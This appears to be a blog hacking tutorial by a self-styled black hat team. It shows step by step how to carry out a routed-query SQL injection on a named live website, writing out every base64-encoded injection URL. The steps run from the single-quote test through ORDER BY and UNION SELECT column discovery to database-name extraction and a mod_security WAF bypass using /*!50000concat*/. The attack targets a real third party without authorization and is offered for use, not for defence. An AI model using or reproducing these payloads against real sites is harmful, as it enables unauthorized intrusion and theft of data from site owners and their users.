Sqli With Routed Query And Base64(Encode,Decode)

Less:-7. Sqli With Routed Query And Base64(Encode,Decode)

Tutorials by Team Hind And CyberSecuritySquad
Intro About Me:-
Name :-                           Navdeep Singh
Facebook_id=                      https://www.facebook.com/navdeep.dhukia.5
Facebook_offical Page(CSS)=       https://www.facebook.com/BlackHatHackers555
Facebook_offical Page(Team_Hind)  https://www.facebook.com/TeamHind/
Website:-                         http://www.securitykiller.org

requirement:-
1.Modified Hackbar(HackBar Pro)  I Leave It A Link Under The Video Download It.

Step1. First Check This Site Valurnable Or Not......
i Have A site http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5n

Step2. In This Website Id Is Encypted Into Base64 So First Decypted it(TGV2ZWwgNCBCaWxsaW5n). (like My Video)
i Decrpted It After Decrypted Its Convert Into(Level 4 Billing)
we will add single quoto(') after:- ?sb=Level 4 Billing'
Like This http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing'
Now Agin Encypted Into Base 64 (Level 4 Billing')
Now Url Is:- http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJw==
Hit Enter


Step3. After adding the Sigle Quoto(') If Site Showing Some Sqli Error Or Hide Data On This This Mins Its Valurnable.

Step4. Start The  Opration On Url, Now We Will Count total Number Of Columns In Information_schema.
               We Will Use Order By Query For The Count The Columns.
               So Now Again Decrypt This Code(TGV2ZWwgNCBCaWxsaW5nJw==) and add order by.
    Like This:-  http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing'order by 100-- -
    Now Encrypt Hole Section Again base 64 (Level 4 Billing'order by 100--+)
   
    Now Url Like This:- http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBvcmRlciBieSAxMDAtLSAt
   
      Error Columns Is Under 100 Here Is 5 Columns.
     
Now I Select Order by 5 Columns
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBvcmRlciBieSA1LS0gLQ==

Here Is Total no. Of Columns Is 5 Because at 6 there is Error

Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns
Like This:-  http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' UNION SELECT 1,2,3,4,5-- -
Now Encrypted It Like this:- http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBVTklPTiBTRUxFQ1QgMSwyLDMsNCw1LS0gLQ==

Not Showing Any Valurnble Columns Now Try Routed Query. like This
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' order by 12-- -",2,3,4,5-- -

Now Encrypt Into base64
Like This:-
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBhbmQgMCBVTklPTiBTRUxFQ1QgIjEnIG9yZGVyIGJ5IDEyLS0gLSIsMiwzLDQsNS0tIC0=

Step6. Now use Union Select  like This:- http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- -",2,3,4,5-- -
Now Encrypted It:-
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBhbmQgMCBVTklPTiBTRUxFQ1QgIjEnIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMi0tIC0iLDIsMyw0LDUtLSAt

We Got It vulrnable Column That Is (8).

Step6.Now I Print (databasename and Version)
 Data Base:-
 http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12-- -",2,3,4,5-- -

 Now Encrypt It:-
 Like This:-
 http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=TGV2ZWwgNCBCaWxsaW5nJyBhbmQgMCBVTklPTiBTRUxFQ1QgIjEnIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LGRhdGFiYXNlKCksOSwxMCwxMSwxMi0tIC0iLDIsMyw0LDUtLSAt

Db Is:-
shopno_crtv

Step7. Now I Try To Print Database And Version Using Cobcat .

If I Try To Print using Concat Website Showing A Error, That mins Here Is WAf(mod_security) That Block Concat So I bypass it (/*!50000concat*/).

Like This:-
http://creativeitsoft.net/page.php?mn=Vk9JUCBBcHBsaWNhdGlvbg==&sb=Level 4 Billing' and 0 UNION SELECT "1' UNION SELECT 1,2,3,4,5,6,7,/*!50000concat*/(database(),0x3a,version()),9,10,11,12-- -",2,3,4,5-- -



 I Thing You Under-Stand About Me Next All Step is Same Simple Union based Like less1.
 Follow  Me On You Tube:-



 We Are:- | VIKYP | INDCYBERJOCKER |  In73ct0r d3vil | Navdeep Singh | CYBA TIGER | ANONFIGHTER | Mr.Hex | GHOSTF133T | VINEET RV | Hacker Ritz | SNIPER |

Keywords:-
Hacking By Navdeep Singh, Hackers Blog, Black Hat Hacker,

Hackers, hacking, Hacking News Blog, Free Hacking Study, Best Hacking Institute, Xss, Cross Site Scripting, Stored XSS, How To Hack, Hacking Book, Hacking Tools, Hacking Tutorials, Windows Hacking, Advance System Hacking, Website Hacking, Hacking News, Hackers News, The Hackers News
Mobile Hacking, Games Hacking, Android Hacking, Facebook Hacking, Google Hacking, Google Dorks, Email Hacking, Virus, Gmail Hacking, Whats App Hacking, Ip Changer, Ip Hide, tor, Cracking Tools, email hacking, Android Tools For Hacker, Mobile Game Hacking, Pc Game hacking, Facebook Trick, Clickjacking, Metasploit Tutorial, phising, phising attack, Keylogger Tutorial, Keylogger, KALI AND BACKTRACK, KALI AND BACKTRACK Tutorial, Web Hacking, Sqli, Sql Injection, Sqli Cheat Sheet, Sqli Admin Bypass
Sqli With Routed Query And Base64(Encode,Decode) Sqli With Routed Query And Base64(Encode,Decode) Reviewed by Unknown on 12/09/2015 Rating: 5
Powered by Blogger.